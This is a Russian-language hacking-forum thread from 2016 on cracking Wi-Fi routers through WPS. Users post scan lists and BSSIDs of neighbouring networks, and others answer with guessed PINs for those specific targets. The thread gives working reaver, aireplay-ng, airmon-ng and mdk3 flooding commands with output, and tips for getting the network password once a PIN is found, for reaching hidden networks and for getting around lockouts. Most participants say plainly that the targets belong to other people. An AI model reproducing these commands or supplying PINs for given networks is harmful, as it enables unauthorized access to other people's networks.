C0:4A:00:00:00:00 -30 23 0 0 13 54e. WPA2 CCMP PSK

AC:F1F:00:00:00 -44 13 0 0 2 54e WPA2 CCMP PSK abc01

90:94:E4:00:00:00 -47 2 0 0 1 54e WPA2 CCMP PSK abc02

D8:EB:97:00:00:00 -50 15 0 0 6 54e WPA2 CCMP PSK abc03

F8:BF:09:00:00:00 -54 16 0 0 6 54e WPA2 CCMP PSK abc04

C0:4A:00:00:00:00 -52 14 0 0 6 54e. WPA2 CCMP PSK abc05

F8:1A:67:00:00:00 -59 14 3 1 11 54e. WPA2 CCMP PSK abc06

74:EA:3A:00:00:00 -58 6 5 0 13 54e. WPA2 CCMP PSK abc07

90:94:E4:00:00:00 -60 15 0 0 11 54e. WPA2 CCMP PSK abc08

90:EF:68:00:00:00 -61 25 0 0 9 54e WPA2 CCMP PSK

AC:F1F:00:00:00 -63 13 0 0 6 54e. WPA CCMP PSK abc09

C4:A8:1D:00:00:00 -62 3 0 0 4 54e. WPA2 CCMP PSK abc10

04:A1:51:00:00:00 -62 19 0 0 3 54e. WPA TKIP PSK abc11

C8:BE:19:00:00:00 -63 22 0 0 1 54e WPA2 CCMP PSK abc11

DC:9FB:00:00:00 -67 13 0 0 39 54e. WPA2 CCMP PSK

90:F6:52:00:00:00 -66 10 0 0 6 54e. WEP WEP abc12

64:70:02:00:00:00 -67 14 2 0 11 54e. WPA2 CCMP PSK abc13

DC:9FB:00:00:00 -67 15 0 0 38 54e. WPA2 CCMP PSK

146:4D:00:00:00 -72 19 0 0 13 54e. WPA2 CCMP PSK abc14

C4:6E:1F:00:00:00 -69 11 0 0 6 54e. WPA2 CCMP PSK abc15

6A:28:5D:00:00:00 -71 14 0 0 11 54e WPA2 CCMP PSK abc16

00:1C:F0:00:00:00 -71 4 0 0 6 54 . WPA2 CCMP PSK abc17

F0:7D:68:00:00:00 -73 18 0 0 1 54e. WPA2 CCMP PSK abc18

E0:3F:49:00:00:00 -72 6 0 0 4 54e WPA2 CCMP PSK abc19

1C:AF:F7:00:00:00 -71 9 0 0 11 54e. WPA2 CCMP PSK abc20

F8:BF:09:00:00:00 -72 2 0 0 7 54e WPA2 CCMP PSK abc21

EC:43:F6:00:00:00 -73 4 0 0 4 54e WPA2 CCMP PSK abc22

C8:BE:19:00:00:00 -74 4 0 0 11 54e WPA2 CCMP PSK abc23

C4:04:15:00:00:00 -75 13 0 0 11 54e WPA2 CCMP PSK abc24

MACи и названия точек чтобы не палить немного изменил

Triton_Mgn
15.08.2016, 00:23
Я понял, что за адаптер в третий раз спрашиваю.

mybitco
15.08.2016, 00:34
Я понял, что за адаптер в третий раз спрашиваю.



вроде так он называется на алиэкспрессе(прямо сейчас не посмотреть точно)

long rang BT-N9100 Beini USB Wifi Adapter Wireless Network Card Ralink 3070 High Power 3000mW Dual Antenna

Triton_Mgn
15.08.2016, 00:36
Со всеми точками такая беда?

Triton_Mgn
15.08.2016, 00:40
зайди лучше со своим адаптером в тему https://forum.antichat.ru/threads/57249/ Список адаптеров пригодных, вопросы решаться само собой. То , что твой адаптер на Ralinke 3070 -все фигня, а потом приходи сюда, мы поможем.

Triton_Mgn
15.08.2016, 00:42
Это фейк/ альфа мощная 1000 mw/

Triton_Mgn
15.08.2016, 00:47
Посчитай сам по закону Ома , USB -5 Вольт, 0.5 Ампер.

mybitco
15.08.2016, 01:08
зайди лучше со своим адаптером в тему https://forum.antichat.ru/threads/57249/ Список адаптеров пригодных, вопросы решаться само собой. То , что твой адаптер на Ralinke 3070 -все фигня, а потом приходи сюда, мы поможем.



Спасибо, сейчас там спрошу, тем более что уже откопал ссылку на алиэкспрессе на мой девайс.



Со всеми точками такая беда?



С теми которыми пробовал со всеми

Modern888
15.08.2016, 01:37
Ребят, подскажите.

На точке Dir-320nru выключили WPS и сменили пароль (WPA2).

Можно ли взломать/подключиться зная пин код? (Windows 7, AirSlax).

khamyk
15.08.2016, 01:46
Так вроде ж писалось что это из за драйверов на новых ядрах.Или я че то не так понял?Попробуй wifislax,нафиг вообще этот Кали каличный.

И насчет адаптера,из моего опыта,скажу что чувствительность у них хорошая,а вот с отдачей у них беда.Слабее всех что я щупал.А и нафиг ты взял на две антены?Форум надо было сначала читать.

khamyk
15.08.2016, 01:48
Ребят, подскажите.

На точке Dir-320nru выключили WPS и сменили пароль (WPA2).

Можно ли взломать/подключиться зная пин код? (Windows 7, AirSlax).



Раз wps отключили,как ты собираешься по пину подключиться?Нет,нельзя.

mybitco
15.08.2016, 02:05
Так вроде ж писалось что это из за драйверов на новых ядрах.Или я че то не так понял?Попробуй wifislax,нафиг вообще этот Кали каличный.

И насчет адаптера,из моего опыта,скажу что чувствительность у них хорошая,а вот с отдачей у них беда.Слабее всех что я щупал.А и нафиг ты взял на две антены?Форум надо было сначала читать.



Да я год назад брал китайскую альфу на Realtek8187L, но она накрылась после успешного подбора всего 1-го пина, а сейчас снова понадобилось пин подобрать так решил взять на RT3070 чипсете, вроде говорят он всеми ОС поддерживается, подумалось что 2 антенны будет более уверенный прием(дальность) вот и взял с 2-мя антеннами.

wifislax-ом никогда не пользовался, попробую сейчас.

khamyk
15.08.2016, 02:14
Да я год назад брал китайскую альфу на Realtek8187L, но она накрылась после успешного подбора всего 1-го пина, а сейчас снова понадобилось пин подобрать так решил взять на RT3070 чипсете, вроде говорят он всеми ОС поддерживается, подумалось что 2 антенны будет более уверенный прием(дальность) вот и взял с 2-мя антеннами.

wifislax-ом никогда не пользовался, попробую сейчас.



Две антены в данном экземпляре это наоборот хуже.И если тебе адаптер нужен был только для взлома,то лучше взял бы опять на Realtek8187L,этих проблем бы небыло.

Triton_Mgn
15.08.2016, 02:16
Усли



Две антены в данном экземпляре это наоборот хуже.И если тебе адаптер нужен был только для взлома,то лучше взял бы опять на Realtek8187L,этих проблем бы небыло.



Нескажи , альфа NH бомбит тоже.

Только не из подвала.

khamyk
15.08.2016, 02:25
Усли

Нескажи , альфа NH бомбит тоже.

Только не из подвала.



Я имел ввиду в место того что он сейчас купил.А в Альфе я не сомневаюсь.

mybitco
16.08.2016, 19:23
Пока разбираюсь с дровами к моему железу помогите найти PIN к роутерам:

04:A1:51:99:3D:5A

Manufacturer: NTGR

Model Name: wnr1000v2

64: 70: 02: D8: EE: 0E

Manufacturer: TP-LINK

Model Name: TL-WR741ND

Model Number: 4.0

Access Point Serial Number: 1.0

генератор wpspin.html нифига не работает.

fire-dance
16.08.2016, 19:39
Пока разбираюсь с дровами к моему железу помогите найти PIN к роутерам:

04:A1:51:99:3D:5A

Manufacturer: NTGR

Model Name: wnr1000v2

64: 70: 02: D8: EE: 0E

Manufacturer: TP-LINK

Model Name: TL-WR741ND

Model Number: 4.0

Access Point Serial Number: 1.0

генератор wpspin.html нифига не работает.


NTGR

http://zalil.su/4714921

и еще 1 попробуй

10042714

TL-WR741ND

пробуй

14216718

mybitco
16.08.2016, 20:13
NTGR

http://zalil.su/4714921

и еще 1 попробуй

10042714

TL-WR741ND

пробуй

14216718



Увы, но все мимо

А может к этим найдутся пины?

90:94:E4:AC:66:09

Manufacturer: Ralink Technology, Corp.

Model Name: Ralink Wireless Access Point

Model Number: RT2860

74:EA:3A:E0:2E:CA

Manufacturer: TP-LINK

Model Name: TL-WR743ND

Model Number: 1.0

Access Point Serial Number: 1.0

fire-dance
16.08.2016, 20:32
Увы, но все мимо

А может к этим найдутся пины?

90:94:E4:AC:66:09

Manufacturer: Ralink Technology, Corp.

Model Name: Ralink Wireless Access Point

Model Number: RT2860

74:EA:3A:E0:2E:CA

Manufacturer: TP-LINK

Model Name: TL-WR743ND

Model Number: 1.0

Access Point Serial Number: 1.0



Ralink Technology, Corp.

02415635

45559853

38953910

12983131

19513027

11298313

53396471

97865223

TL-WR743ND

14692042

39777706

46920423

henri2002
16.08.2016, 22:16
TL-WR743ND

14692042

39777706

46920423



а что, пины на туполинки уже считаются?

mybitco
16.08.2016, 22:23
Увы, но и эти пины не подошли

mazik
19.08.2016, 11:27
КАРТИНКИ РОУТЕРОВ

http://zalil.su/1284461

У КОГО ЕСТЬ СВОБОДНОЕ ВРЕМЯ, ПРОШУ ПРИСОЕДИНИТЬСЯ К СБОРУ КАРТИНОК

ОЧЕНЬ МНОГО ПОЛЕЗНОЙ ИНФОРМАЦИИ ПОЛУЧАЕТЬСЯ

Triton_Mgn
19.08.2016, 12:21
КАРТИНКИ РОУТЕРОВ

http://zalil.su/1284461

У КОГО ЕСТЬ СВОБОДНОЕ ВРЕМЯ, ПРОШУ ПРИСОЕДИНИТЬСЯ К СБОРУ КАРТИНОК

ОЧЕНЬ МНОГО ПОЛЕЗНОЙ ИНФОРМАЦИИ ПОЛУЧАЕТЬСЯ



Лучше с этих картинок инфу в текстовый файл собрать.

kabachina
19.08.2016, 16:26
Что делать если reaver нашел pin но не выдает psk ? Кто может помогите)

Triton_Mgn
19.08.2016, 19:38
Что делать если reaver нашел pin но не выдает psk ? Кто может помогите)



Подключайся на винде через qss for wireless, потом в профиле беспроводных сетей посмотришь пароль.

https://driver.ru/?file_cid=10902356565143145d651cf59519

vedemur
19.08.2016, 21:37
Что делать если reaver нашел pin но не выдает psk ? Кто может помогите)



В ривере подставит -р ХХХХХХХ (пин без последней цифры), т.е. reaver -i mon0 -b xxxxxxxx -N -S -vv -p xxxxxxx

kabachina
20.08.2016, 00:18
В ривере подставит -р ХХХХХХХ (пин без последней цифры), т.е. reaver -i mon0 -b xxxxxxxx -N -S -vv -p xxxxxxx



Не работает, результат тот



В ривере подставит -р ХХХХХХХ (пин без последней цифры), т.е. reaver -i mon0 -b xxxxxxxx -N -S -vv -p xxxxxxx



Не работает, результат тот же((

kabachina
20.08.2016, 00:19
Подключайся на винде через qss for wireless, потом в профиле беспроводных сетей посмотришь пароль.

https://driver.ru/?file_cid=10902356565143145d651cf59519



Работает, определенно плюс тебе в карму мужик!

kabachina
20.08.2016, 02:33
Подключайся на винде через qss for wireless, потом в профиле беспроводных сетей посмотришь пароль.

https://driver.ru/?file_cid=10902356565143145d651cf59519



А есть совет как для скрытых сетей сделать такой же трюк. QSS видит только открытые сети, впрочем как и Dumpper...

kulure
20.08.2016, 17:45
Помогите запустить reaver на подбор пина плс.

Имею: ноут со встроенным Wi-Fi, внешний USB-Wi-Fi на чипсете RT3070, KALI версия январь 2016 (загрузка KALI с флешки)

Последовательность моих действий такова:

1. iwconfig (показывает что у меня действительно есть 2 wlan адаптера)

2. airmon-ng check kill (убиваю все лишнее)

3.

root@kali:~# airmon-ng start wlan1

PHY Interface Driver Chipset

phy0 wlan0 iwl3945 Intel Corporation PRO/Wireless 3945ABG [Golan] (rev 02)

phy1 wlan1 rt2800usb Ralink Technology, Corp. RT2870/RT3070

(mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)

(mac80211 station mode vif disabled for [phy1]wlan1)

4. airodump-ng wlan1mon (получаю список всех доступных точек доступа)

5. wash -i wlan1mon (так wash не работал, wash -i wlan1mon -C а так заработал)

6.

root@kali:~# reaver -i wlan1mon -b 00:11:22:33:44:55 -c 1 -S -L -w

Reaver v1.5.2 WiFi Protected Setup Attack Tool

Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>

mod by t6_x <[email protected]> & DataHead & Soxrok2212

[+] Waiting for beacon from 00:11:22:33:44:55

[!] WARNING: Failed to associate with 00:11:22:33:44:55 (ESSID: abc)

[!] WARNING: Failed to associate with 00:11:22:33:44:55 (ESSID: abc)

[!] WARNING: Failed to associate with 00:11:22:33:44:55 (ESSID: abc)

^C

(пробовал наугад задавать аргументы к reaver , но результат не менялся пока не наткнулся в инете на такой вариант(ниже))

reaver -i wlan1mon -c 6 -b 00:11:22:33:44:55 -v -v -A -vv

получаю:

[+] Switching wlan1mon to channel 6

[+] Waiting for beacon from 64:70:028:EE:0E

[+] Associated with 64:70:028:EE:0E (ESSID: interzet373)

[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000

[+] Trying pin 12345670.

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[!] WARNING: 25 successive start failures

[+] Sending EAPOL START request

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x02), re-trying last pin

[+] Trying pin 12345670.

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[+] Sending EAPOL START request

(это уже лучше смотрится, вроде хоть есть попытка отправить пин, только она длится вечно на одном месте)

Сразу отмечу что сигнал сильный, подскажите плс возможные причины проблемы и варианты их устранения? как заставить reaver перебирать пины?



Так получилось когда создал флэшку в rufus не учитывая DD-образ

TOX1C
20.08.2016, 19:30
У КОГО ЕСТЬ СВОБОДНОЕ ВРЕМЯ, ПРОШУ ПРИСОЕДИНИТЬСЯ К СБОРУ КАРТИНОК



Вот и мой небольшой пак всяких туполинков и хуявеев

http://rgho.st/7BytQyszD

kabachina
20.08.2016, 19:58
Так получилось когда создал флэшку в rufus не учитывая DD-образ



Пробуй так. В одной вкладке:

aireplay-ng start wlan0

sudo airmon-ng check kill

sudo service NetworkManager stop

sudo iw dev wlan1mon set channel X ,X - nomer kanala

aireplay-ng wlan1mon -1 120 -a BSSID -e ESSID

в другой вкладке:

reaver -i wlan1mon -A -b BSSID -T 0.5 -vv -S -w -N -c X

mazik
21.08.2016, 14:24
КАРТИНКИ РОУТЕРОВ

http://zalil.su/1284461

У КОГО ЕСТЬ СВОБОДНОЕ ВРЕМЯ, ПРОШУ ПРИСОЕДИНИТЬСЯ К СБОРУ КАРТИНОК

ОЧЕНЬ МНОГО ПОЛЕЗНОЙ ИНФОРМАЦИИ ПОЛУЧАЕТЬСЯ



КАРТИНКИ РОУТЕРОВ-2

Ссылка на файл:http://zalil.su/5177290

mybitco
23.08.2016, 16:07
Так получилось когда создал флэшку в rufus не учитывая DD-образ



Да, флэшку делал rufus-ом, DD-образ не учитывал т.к. не знаю что это такое, а надо было выбрать опцию DD при записи флэшки?

Venusbonus
24.08.2016, 19:07
Господа, роутеры Broadcom и ZTE совсем не ломаются ривером или мне просто не везет ? Оба типа поставлены московским монополистом. Просто крутит на первом пине до бесконечности.

VladimirV
24.08.2016, 19:09
Господа, роутеры Broadcom и ZTE совсем не ломаются ривером или мне просто не везет ? Оба типа поставлены московским монополистом. Просто крутит на первом пине до бесконечности.


BSSID?

fire-dance
24.08.2016, 19:24
Господа, роутеры Broadcom и ZTE совсем не ломаются ривером или мне просто не везет ? Оба типа поставлены московским монополистом. Просто крутит на первом пине до бесконечности.


Broadcom

не знаю

ZTE должны ламаться быстро пикси скрипт у них пароли WJEERWFG такого типа

Venusbonus
24.08.2016, 21:20
BSSID?



DC:02:8E:B3:A6:0F

2C:26:C5:01:5A:8E

78:96:82:2A:E2:0E

E4:77:23:7A:E1:EA

DC:02:8E:B5:B9:3B

EC:43:F6:08:BD:48

VladimirV
24.08.2016, 21:48
EC:43:F6:08:BD:48



24 bit = 05727445

Inferno808
25.08.2016, 09:14
Никто не знает, что делать, если роутер после определенного количества неправильных pin кодов уходит в блокировку до перезагрузки?

Можно ли через Kali Linux его перезагрузить как-нибудь, чтобы продолжить подбор?

Alexmeh
25.08.2016, 18:08
Никто не знает, что делать, если роутер после определенного количества неправильных pin кодов уходит в блокировку до перезагрузки?

Можно ли через Kali Linux его перезагрузить как-нибудь, чтобы продолжить подбор?



Сходу и не ответить.....

178 страниц - это, конечно много, но после прочтения их большинство подобных вопросов отпадает само собой.

Рекомендую!

tp-link
25.08.2016, 20:05
Никто не знает, что делать, если роутер после определенного количества неправильных pin кодов уходит в блокировку до перезагрузки?

Можно ли через Kali Linux его перезагрузить как-нибудь, чтобы продолжить подбор?



хендшейк поймать не судьба и выложить в соседнюю ветку???

kabachina
26.08.2016, 00:55
Господа, роутеры Broadcom и ZTE совсем не ломаются ривером или мне просто не везет ? Оба типа поставлены московским монополистом. Просто крутит на первом пине до бесконечности.


Кака ривером ломаешь (выдай строку)?

Rosalina
26.08.2016, 21:04
Всем привет. Посоветовали в этой теме спросить.

C4:6E:1F:A3:14:8E

Модель: tl-wr720n

Есть что нибудь на неё?

Ривер останавливается после тысячной попытки, пробую через wifislax.

Rosalina
26.08.2016, 21:16
Поймат хендшейк и сюда https://forum.antichat.ru/threads/435763/page-135#post-3985026 может повезет.....



Ловила уже

И в платную тему кидала. Без результата, забить?

VladimirV
26.08.2016, 21:21
Ловила уже

И в платную тему кидала. Без результата, забить?



Попробуйте пин - 46227645, вдруг повезет?

Rosalina
26.08.2016, 23:07
Попробуйте пин - 46227645, вдруг повезет?



Спасибо, но увы. Через QSS wireless не подключается, может я не правильно что-то делаю?

KaliHack
27.08.2016, 22:38
Не получается взломать WPS через карту Alfa. Ломаю через reaver собственную точку, подверженную уязвимости pixie dust. Возникает ошибка Failed to associate with. Причем у меня есть вторая карта, дешевая от TP-Link, она ломает WPS на моей точке без проблем. В чем косяк понять не могу, почему одна карта может авторизоваться, а другая нет. MAC целенаправленно не меняю. Хотя если на карте тп-линк установить левый, но одинаковый МАС как на мониторе, так и на физическом, то тоже всё ломается. Пробовал делать авторизацию через айрплей, а ривер запускать с ключом А, то тоже не работает.

KaliHack
27.08.2016, 22:47
Alfa - ОРИГИНАЛ??? или китай???

Лови хендшейк и сюда https://forum.antichat.ru/threads/435763/page-136#post-3985275 может повезет.........



Альфа оригинал. Мне не нужны чужие услуги, я учусь пентесту. Точку свою сломал уже всеми возможными способами, проблема только в том, что одна и двух карт не может авторизоваться reaver'ом. Вот думаю почему. Китайская пукалка причем без проблем ломает WPS.

VladimirV
27.08.2016, 22:53
Альфа оригинал. Мне не нужны чужие услуги, я учусь пентесту. Точку свою сломал уже всеми возможными способами, проблема только в том, что одна и двух карт не может авторизоваться reaver'ом. Вот думаю почему. Китайская пукалка причем без проблем ломает WPS.



Тогда пишите какая Alfa и TpLink.

Какой режим на роутере - b, g, n.

KaliHack
27.08.2016, 22:57
Тогда пишите какая Alfa и TpLink.



TP-LINK TL-WN722N и Alfa AWUS051NH v2

Под альфой пробовал запускать команду aireplay-ng -1 120 -a -e wlan0mon, карточка успешно ассоциируется. А в reaver добавлял ключ А (использовать сторонний процесс для ассоциации), ошибка ассоциации не возникает, но сам процесс взлома просто виснет.

Anton91x
28.08.2016, 20:04
А есть совет как для скрытых сетей сделать такой же трюк. QSS видит только открытые сети, впрочем как и Dumpper...



Зайдите в ЦЕНТР УПРАВЛЕНИЯ СЕТЯМИ И ОБЩИМ ДОСТУПОМ, нажмите СОЗДАНИЕ И НАСТРОЙКА НОВОГО ПОДКЛЮЧЕНИЯ ИЛИ СЕТИ, выбирите ПОДКЛЮЧЕНИЕ К БЕСПРОВОДНОЙ СЕТИ ВРУЧНУЮ, укажите имя скрытой сети, несмотря на то, что сеть защищена установите тип безопасности НЕТ ПРОВЕРКИ ПОДЛИННОСТИ, теперь вы можете подключиться к ней через qss по пин-коду

VerniteAccount
29.08.2016, 14:22
Ребят, выручайте:

ESSID: 04:BF:6D:05:47:5A

BSSID: lesnaya_dolina

На точке включен WPS но AndroDumpper не нашел пин, вслед за ним сдулся и WiFiAccess (все делал под Android. 3WiFi показал Keenetic Lite III.

Еще парочка маков на десерт:

38:2C:4A:65:CE:B8

E0:3F:49:05:05:_D8

AC:22:OB:BD:BE:72

40:4A:03:C6:8A:1A

A0:F3:C1:CC:8E:9C

binarymaster
29.08.2016, 15:07
3WiFi показал Keenetic Lite III.



В третьей серии алгоритм отличается, и он неизвестен.

Felis-Sapiens
29.08.2016, 15:18
Еще парочка маков на десерт:

38:2C:4A:65:CE:B8

E0:3F:49:05:05:_D8

AC:22:OB:BD:BE:72

40:4A:03:C6:8A:1A

A0:F3:C1:CC:8E:9C



38:2C:4A:65:CE:B8

ASUS RT-N18U - алгоритм неизвестен

E0:3F:49:05:05:D8

ASUS RT-N66U - алгоритм неизвестен

AC:22:0B:BD:BE:72

ASUS RT-N15U - алгоритм неизвестен

40:4A:03:C6:8A:1A

ZyXEL ZyWALL Series NBG334W EE - алгоритм неизвестен

A0:F3:C1:CC:8E:9C

TP-LINK TL-WR841N - алгоритм неизвестен

VerniteAccount
29.08.2016, 15:36
38:2C:4A:65:CE:B8

ASUS RT-N18U - алгоритм неизвестен

E0:3F:49:05:05:D8

ASUS RT-N66U - алгоритм неизвестен

AC:22:0B:BD:BE:72

ASUS RT-N15U - алгоритм неизвестен

40:4A:03:C6:8A:1A

ZyXEL ZyWALL Series NBG334W EE - алгоритм неизвестен

A0:F3:C1:CC:8E:9C

TP-LINK TL-WR841N - алгоритм неизвестен



То самое чувство, когда куча тян вокруг, а ни одна не дает...

И кстати, thank`s за 3wifi, в частности за генератор пинов, лучше не найти...

Однако, хочется увидеть аппу под Android, либо хотя-бы сменить дизайн сайта на респонзитивный Boostrap, мои глаза фронтендера не могут смотреть на ЭТО вместо дизайна (без обид, хотя в 2007-й вернулся на пару минут, за это спасибо).

И последняя просьба, может быть у тебя залежался инвайт, я бы с радостью его принял, моей альфе просто не терпится прогуляться по городу в поисках доступных тян, ну а я поделюсь для народа, мне не жалко)

Felis-Sapiens
29.08.2016, 15:45
Однако, хочется увидеть аппу под Android, либо хотя-бы сменить дизайн сайта на респонзитивный Boostrap, мои глаза фронтендера не могут смотреть на ЭТО вместо дизайна (без обид, хотя в 2007-й вернулся на пару минут, за это спасибо).



Исходники есть на github, pull request'ы принимаются

Triton_Mgn
30.08.2016, 21:15
То самое чувство, когда куча тян вокруг, а ни одна не дает...

И кстати, thank`s за 3wifi, в частности за генератор пинов, лучше не найти...

Однако, хочется увидеть аппу под Android, либо хотя-бы сменить дизайн сайта на респонзитивный Boostrap, мои глаза фронтендера не могут смотреть на ЭТО вместо дизайна (без обид, хотя в 2007-й вернулся на пару минут, за это спасибо).

И последняя просьба, может быть у тебя залежался инвайт, я бы с радостью его принял, моей альфе просто не терпится прогуляться по городу в поисках доступных тян, ну а я поделюсь для народа, мне не жалко)



Как ваша Альфа и прогулка по городу связана с базой? kismet+gps - это координаты.

Если ваша тян - 1 город, это похвально, но мало.

Зачем ставить условия - инвайт за работу.

Утром стулья -вечером деньги.

Чем больше инвайтов, тем больше проблем, когда они выдаются, это как бы значит , что ты заслужил и не накосячешь, сколько раз уже говорилось.

И даже у кого усть 3 приглашения инвайта, вправе сами думать кому дать, но.. Если какой косяк -- тут все отвечают за всех и помогают.

Извини, но нет.

Чуть не забыл , вы можете возвращаться в любой другой год кроме 2007, bd настолько полная и объемная, что не каждый сервер справляется с ней, обычно думают, что это мелкий проект.

Mr Drill
03.09.2016, 21:18
Какой эффективный метод забарывания TP-LINK TL-WR841N по WPS? Есть что-нибудь свеженькое, кроме этого унылого резюме http://www.hackingtutorials.org/wif...ack-a-tp-link-wr841n-router-wireless-network/ ?

Какой пин к BSSID: 10:FE:ED:F5:5B:C6 или близкому по mac?

Triton_Mgn
03.09.2016, 21:21
Какой эффективный метод забарывания TP-LINK TL-WR841N по WPS? Есть что-нибудь свеженькое, кроме этого унылого резюме http://www.hackingtutorials.org/wif...ack-a-tp-link-wr841n-router-wireless-network/ ?

Какой пин к BSSID: 10:FE:ED:F5:5B:C6 или близкому по mac?



Кроме этого резюме- эссе, больше ничего нет. Лови просто хендшейк и выкладывай в тему подбора.

Mr Drill
03.09.2016, 21:29
Кроме этого резюме- эссе, больше ничего нет. Лови просто хендшейк и выкладывай в тему подбора.



Ну с ХШ понятно, но неужели эта совсем немолодая и весьма распространённая в силу дешевизны модель по-прежнему непреступна? Не верю!

VladimirV
03.09.2016, 21:33
Какой эффективный метод забарывания TP-LINK TL-WR841N по WPS? Есть что-нибудь свеженькое, кроме этого унылого резюме http://www.hackingtutorials.org/wif...ack-a-tp-link-wr841n-router-wireless-network/ ?

Какой пин к BSSID: 10:FE:ED:F5:5B:C6 или близкому по mac?



если при флуде mdk3

mdk3 mon0 a -a BSSID

Точка меняет канал, тогда взломать можно.

https://forum.antichat.ru/threads/310835/page-104#post-3760910

там на следующих страницах почитаете.

Artos33
07.09.2016, 18:15
Работает, определенно плюс тебе в карму мужик!



Kak ti zdelal?Mne toze samoje....

Triton_Mgn
07.09.2016, 18:19
По русски говоришь?

Iva
09.09.2016, 12:42
Привет, можно как нибудь узнать wps pin по модели и мак?

TL-WR740N

10:FE:ED:FB:98:44

turboxxx
10.09.2016, 11:34
Может кто нибудь перепроверить правильно ли я pin подобрал EE:43:F67:0D:48

PIN 40936406

Если не правильно, то если не затруднит подскажите.

binarymaster
10.09.2016, 13:38
Может кто нибудь перепроверить правильно ли я pin подобрал



Проверить можно, лишь попробовав его при подключении к точке.

turboxxx
10.09.2016, 14:00
А на самом роутере zyxel EC:43:F67:0D:4D mac

по нему 40936451 pin, но не подходит.

Вошел через wifislax, извините за беспокойство.

binarymaster
10.09.2016, 15:48
Вошел через wifislax, извините за беспокойство.



Да всё в порядке.

Рекомендую просканировать Router Scan'ом и добавить точку в базу.

AlCash88
16.09.2016, 00:37
Привет, может кто поможет найти пин

TL-WR740N

C0:4A:00:AB:924

Заранее благодарен

Felis-Sapiens
16.09.2016, 09:38
Привет, может кто поможет найти пин

TL-WR740N

C0:4A:00:AB:92:D4



Известных алгоритмов нет

killer258
20.09.2016, 09:03
Сходу и не ответить.....

178 страниц - это, конечно много, но после прочтения их большинство подобных вопросов отпадает само собой.

Рекомендую!



Прочёл все страницы. Остался один вопрос, на который не нашёл ответа.

Столкнулся с точкой, поведение которой здесь уже пару раз упоминалось. Сразу же уходит на 90% и начинает перебирать 1234хххх. (без результата)

Я усомнился, что первая же комбинация первых 4 цифр пина, равная 1234 действительно верная, попробовал заставить его начать с любой другой комбинации первых 4-х цифр и увидел,что независимо от перых 4 цифр пина (кроме наверное,правильной первой четвёрки) получается та же самая история. Точка делает вид, что любые первые 4 цифры пина правильные.

Так вот вопрос, а реально ли написать такой скрипт или подправить ривер так, чтобы начав с начала или с любой заданной ему комбинации первых 4 цифр пина и перебрав безрезультатно 999 пинов последней части, ривер не останавливался бы на этом в случае неудачи, а просто инкрементировал на единицу первые 4 цифры пина и опять продолжил бы проверять последние 3 цифры, и так до достижения результата или пока не переберёт все пины (известно из одного из постов этого форума, что при вводе полностью правильного пина точка отвечает как надо)

VasiliyP
20.09.2016, 11:36
перебрав безрезультатно 999 пинов последней части



1000, если быть точным. То, что вы описали - это полный перебор 7 десятичных знаков пина. Допустим, попытка занимает 10 сек. Тогда полный перебор займёт 10e7*10/3600/24=11574 суток. Или 31 год.

killer258
20.09.2016, 13:37
1000, если быть точным. То, что вы описали - это полный перебор 7 десятичных знаков пина. Допустим, попытка занимает 10 сек. Тогда полный перебор займёт 10e7*10/3600/24=11574 суток. Или 31 год.




Да, действительно, я стормозил немного. Ну, хорошо. а нельзя ли к тогда как-то начать вначале с проверки последних трёх цифр пина на правильность? Или же пусть перебирает 1234ххх, но во время этого перебора мы будем проверять одну вещь, а именно:

Известно, что если ривер получил EAP-NACK после отсылки M6, то, соответственно, вторая часть PIN-кода неверна. Значит,получается, что противном случае (неполучение EAP-NACK после отсылки M6 ?) это будет значить, что вторая часть пина верна?

Если всё так и я не ошибаюсь, то после перебора этой тысячи мы уже будем знать вторую половину пина?

Если да, то далее перебираем первые 4 цифры (из 10 тыс) с этой второй верной половиной пина,не взирая на то, что точка будет делать вид, что любые первые 4 цифры верны (подправить ривер?) и будем как ни в чём ни бывало,продолжать их инкремент, не меняя последние 3 цифры пина.

По информации с форума, при полном совпадении пина точка реагирует стандартным образом и даёт пароль . Только этот момент надо "не прозевать " каким-то образом и остановить перебор. Или нет?

И ещё у меня один вопрос возник, как у начинающего. Можно ли для ускорения процесса разложить переборку 11 тыс вариантов пинов на 2 или три разных ривера, работающих каждый на своём компе со своим отдельным адаптером и независимо друг от друга перебирающих назначенный каждому из них свой кусок диапазона пин-кодов данной точки ?

VasiliyP
20.09.2016, 14:45
Значит,получается, что противном случае (неполучение EAP-NACK после отсылки M6 ?) это будет значить, что вторая часть пина верна?



Насколько я понимаю, если получено что-то отличное от "EAP-NACK после отсылки M6" - значит пин полностью правильный. Но если ваша AP позволяет отличить правильную вторую часть пина от неправильной, конечно это всё упрощает.

killer258
20.09.2016, 17:12
если ваша AP позволяет отличить правильную вторую часть пина от неправильной, конечно это всё упрощает.



Можно будет попробовать это проверить, но для этого надо будет наблюдать за процессом перебора этой тысячи, сидеть у монитора часа полтора не отвлекаясь ни на секунду, чтобы заметить несколько другую реакцию на один единственный пин (с правильными последними 3 цифрами) в отличие от остальных 999.

А может ли ривер во время работы протоколировать в файл все эти сообщения, что идут на экране во время процесса подбора, чтоб потом не спеша покопаться в файле?

daemon_mors
20.09.2016, 18:45
А может ли ривер во время работы протоколировать в файл все эти сообщения, что идут на экране во время процесса подбора, чтоб потом не спеша покопаться в файле?



Думаю такой опции в ривере нету. Но вы можете перенаправить stdout в файл командой:

reaver ........ >> filename.txt

Если хотите одновременно писать в файл и наблюдать результат в терминале, просто перенаправьте поток в несколько файлов (одним из которых будет сам терминал) с помощью tee, примерно так:

reaver ......... | tee filename.txt

Kevin Shindel
21.09.2016, 12:11
Думаю такой опции в ривере нету.



http://cs8.pikabu.ru/post_img/2016/03/14/5/1457937644123224991.jpg

http://tools.kali.org/wireless-attacks/reaver

-o, --out-file= Send output to a log file [stdout]



Но вы можете перенаправить stdout в файл командой:

reaver ........ >> filename.txt

Если хотите одновременно писать в файл и наблюдать результат в терминале, просто перенаправьте поток в несколько файлов (одним из которых будет сам терминал) с помощью tee, примерно так:

reaver ......... | tee filename.txt



Как вариант да... но возможность в ривере есть...

daemon_mors
21.09.2016, 16:18
-o, --out-file=<file> Send output to a log file [stdout]



Не знал... Спасибо!

killer258
22.09.2016, 11:04
Cтолкнулся недавно с новым поведением точек при невозможности ассоциироваться с ними.

